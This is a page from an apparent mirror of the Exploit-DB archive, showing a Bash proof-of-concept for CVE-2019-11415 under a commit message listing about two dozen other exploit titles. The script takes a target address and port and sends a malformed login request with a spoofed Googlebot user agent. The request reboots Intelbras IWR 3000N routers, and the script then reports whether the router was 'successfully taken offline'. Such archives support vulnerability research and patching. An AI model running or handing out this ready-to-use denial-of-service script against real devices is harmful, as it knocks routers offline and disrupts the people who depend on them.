bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/hardware/webapps/46768.sh
Offensive Security f3c28b3d62 DB: 2019-05-01 
23 changes to exploits/shellcodes

SpotAuditor 3.6.7 - Denial of Service (PoC)
SpotAuditor 3.6.7 - 'Base64 Encrypted Password' Denial of Service (PoC)
SpotAuditor 5.2.6 - 'Name' Denial of Service (PoC)
Linux - Missing Locking Between ELF coredump code and userfaultfd VMA Modification

IP-Tools 2.5 - Local Buffer Overflow (SEH) (Egghunter)
IP-Tools 2.5 - 'Log to file' Local Buffer Overflow (SEH) (Egghunter)

DeviceViewer 3.12.0.1 - 'user' SEH Overflow
Freefloat FTP Server 1.0 - 'SIZE' Remote Buffer Overflow
Freefloat FTP Server 1.0 - 'STOR' Remote Buffer Overflow
Moodle 3.6.3 - 'Install Plugin' Remote Command Execution (Metasploit)
AIS logistics ESEL-Server - Unauth SQL Injection RCE (Metasploit)
Pimcore < 5.71 - Unserialize RCE (Metasploit)
Netgear DGN2200 / DGND3700 - Admin Password Disclosure
Veeam ONE Reporter 9.5.0.3201 - Multiple Cross-Site Request Forgery
Veeam ONE Reporter 9.5.0.3201 - Persistent Cross-Site Scripting
Veeam ONE Reporter 9.5.0.3201 - Persistent Cross-site Scripting (Add/Edit Widget)
Intelbras IWR 3000N - Denial of Service (Remote Reboot)
Joomla! Component ARI Quiz 3.7.4 - SQL Injection
Intelbras IWR 3000N 1.5.0 - Cross-Site Request Forgery
HumHub 1.3.12 - Cross-Site Scripting
Spring Cloud Config 2.1.x - Path Traversal (Metasploit)
Domoticz 4.10577 - Unauthenticated Remote Command Execution
Joomla! Component JiFile 2.3.1 - Arbitrary File Download
Hyvikk Fleet Manager - Shell Upload
Agent Tesla Botnet - Information Disclosure
Oracle Weblogic 10.3.6.0.0 / 12.1.3.0.0 - Remote Code Execution
2019-05-01 05:02:01 +00:00

36 lines
No EOL
1.3 KiB
Bash
Executable file
Raw Blame History

#/bin/bash
# PoC based on CVE-2019-11415 created by Social Engineering Neo.
#
# Credit: https://1.337.zone/2019/04/08/intelbras-iwr-3000n-any-version-dos-on-malformed-login-request/
#
# A malformed login request allows remote attackers to cause a denial of service (reboot), as demonstrated by JSON misparsing of the \""} string to v1/system/login.
#
# Upgrade to latest firmware version iwr-3000n-1.8.7_0 for 3000n routers to prevent this issue.
clear
read -p "Enter Target Address Followed by Port: " target port # localhost 8080
alive=$(ping -c 1 $target | grep icmp* | wc -l)
if [ "$alive" -eq 0 ]; then
echo Target May be Offline or Blocking ICMP requests.
read -p "Would you Like to Proceed? (Y/n): " ans
if [ "$ans" = 'n' ] || [ "$ans" = 'N' ]; then
clear
exit
fi
fi
if [ "$port" -lt 65536 ] && [ "$port" -gt 0 ]; then
grab=$(curl -s -A 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)' --compressed --data-binary '\""}' $target:$port/v1/system/login)
else
echo "Incorrect Port."
fi
clear
alive=$(ping -c 1 $target | grep icmp* | wc -l)
if [ "$alive" -eq 0 ]; then
echo Router Successfully Taken Offline. #NOTE: if router blocks ICMP requests this may be inaccurate.
else
echo Exploit Unsuccessfull, Target May Not be Vulnerable.
fi
Reference in a new issue View git blame Copy permalink